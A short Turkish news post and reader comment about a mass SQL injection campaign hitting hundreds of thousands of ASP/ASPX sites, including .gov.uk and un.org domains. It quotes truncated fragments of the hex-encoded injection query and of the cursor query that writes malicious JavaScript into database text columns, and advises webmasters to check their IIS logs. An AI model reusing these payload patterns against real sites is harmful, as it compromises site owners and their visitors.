Bir Çin sunucusundan yayıldığı tespit edilen zararlı kodlar, içerisinde '.gov.uk' ve 'un.org' uzantılı siteler de dahil olmak üzere yüzbinlerce siteyi etkilediği bildirildi. Websense'in yaptığı analize göre malware sekiz güvenlik açığını kullanıp sitelere bulaşmakta. Bunların içerisinde 2007 Şubat ayında yaması çıkan VML güvenlik açığıda bulunuyor. Bu demek oluyor ki birçok web sitesi güvenlik açıklarını takip etmiyor sonucunda ise bu tip saldırılara maruz kalıyor.

Analizde saldırıların genellikle .asp ve .aspx uzantılı sitelere aşağıdakine benzer şifrelenmiş bir sql sorgusuyla yapıldığı belirtildi.



DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400 450043004C0041005200450020004[...]


Bu sorgu sayfadaki tüm text alanlarını bulup içlerine zararlı javascript kodunu yerleştirmekte.



DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b[...]


Çözüm olarak özellikle Microsoft IIS kullanan webmaster'ların log dosyalarında benzer sql sorguları var mı yok mu diye kontrol etmeleri öneriliyor.
BİLGİ PAYLAŞTIKÇA GÜZELDİR

2 yıldır var bu olay.Çinliler olayı otomatige bagladı sql açığı olan asp tabanlı sitelere direk hexlenmiş kodu sokuyorlar.